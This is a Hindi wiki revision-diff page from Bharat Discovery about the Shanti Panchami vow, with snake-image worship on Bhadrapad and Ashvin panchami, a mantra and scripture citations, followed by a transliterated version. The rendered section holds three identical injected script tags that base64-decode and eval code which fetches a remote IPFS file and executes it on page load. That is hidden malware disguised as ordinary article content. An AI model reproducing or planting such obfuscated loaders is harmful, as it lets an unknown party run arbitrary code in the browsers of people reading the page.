Difference between revisions of "शान्ती पंचमी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
 
*[[भाद्रपद]] की [[पंचमी]] पर शान्ती पंचमी व्रत किया जाता है।
 
*[[भाद्रपद]] की [[पंचमी]] पर शान्ती पंचमी व्रत किया जाता है।
 
*काले एवं अन्य चूर्णों से [[सर्प|सर्पों]] की आकृतियाँ तथा [[गंध]] आदि से पूजा करनी चाहिए।
 
*काले एवं अन्य चूर्णों से [[सर्प|सर्पों]] की आकृतियाँ तथा [[गंध]] आदि से पूजा करनी चाहिए।
 
*[[आश्विन]] पंचमी पर [[दर्भ|दर्भों]] से सर्पाकृतियाँ बनाकर उनकी पूजा, इन्द्राणी की पूजा भी करनी चाहिए।
 
*[[आश्विन]] पंचमी पर [[दर्भ|दर्भों]] से सर्पाकृतियाँ बनाकर उनकी पूजा, इन्द्राणी की पूजा भी करनी चाहिए।
 
*ऐसी मान्यता है कि शान्ती पंचमी व्रत से कर्ता से सर्प प्रसन्न हो जाते हैं।
 
*ऐसी मान्यता है कि शान्ती पंचमी व्रत से कर्ता से सर्प प्रसन्न हो जाते हैं।
*शान्ती पंचमी मंत्र यह है, '''कुरुल्ले हुं फट्स्वाहा'''।<ref>कृत्यकल्पतरु (व्रत खण्ड 1, 95, केवल आश्विन पंचमी पर); हेमाद्रि (व्रत खण्ड 1, 563-564, [[भविष्य पुराण]] 1|37|1-3 एवं 1|38|1-5 से उद्धरण)</ref>
+
*शान्ती पंचमी मंत्र यह है, '''कुरुल्ले हुं फट्स्वाहा'''।<ref>कृत्यकल्पतरु (व्रत खण्ड 1, 95, केवल आश्विन पंचमी पर); हेमाद्रि (व्रत खण्ड 1, 563-564, [[भविष्य पुराण]] 1|37|1-3 एवं 1|38|1-5 से उद्धरण</ref>
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:01, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • bhadrapad ki panchami par shanti panchami vrat kiya jata hai.
  • kale evan any choornoan se sarpoan ki akritiyaan tatha gandh adi se pooja karani chahie.
  • ashvin panchami par darbhoan se sarpakritiyaan banakar unaki pooja, indrani ki pooja bhi karani chahie.
  • aisi manyata hai ki shanti panchami vrat se karta se sarp prasann ho jate haian.
  • shanti panchami mantr yah hai, kurulle huan phatsvaha.[1]

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. krityakalpataru (vrat khand 1, 95, keval ashvin panchami par); hemadri (vrat khand 1, 563-564, bhavishy puran 1|37|1-3 evan 1|38|1-5 se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>